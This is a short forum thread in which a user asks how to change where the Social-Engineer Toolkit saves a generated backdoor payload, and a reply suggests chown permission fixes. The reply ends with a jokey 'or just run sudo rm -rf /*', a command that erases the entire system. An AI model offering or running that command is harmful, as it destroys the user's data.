[SOLVED] Payload & Setoolkit Issues

Started by Kryptedbbkick, June 13, 2015, 07:02:01 AM

Previous topic - Next topic

Kryptedbbkick

Hello so i recently did a clean install of linux backbox and it looks great and it has alot more and great things added but one thing that keeps catching my eye that is killing me so when i make a backdoor payload it puts it in /root/.set/payload.exe but i miss its old destination back in /usr/share/setoolkit/ ? i was wondering how i can change it back because apparently i can not have assess to my root files even if i do it in terminal and add myself to root ?

ZEROF

Hi,

Simple solution is to give right permission to folder with your payload file. Other solution is to get your eyes on source code and edit him for your needs.

chown -R yourusername:yourusername /root/.set/

or

chown -R yourusername:yourusername /root/.set/*.exe (just to edit permission on your exe file)

But as you run SET as root i don't see why this is the problem at all, you don't have permission issue, just you need to get use to it when you use system without full rooted system.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*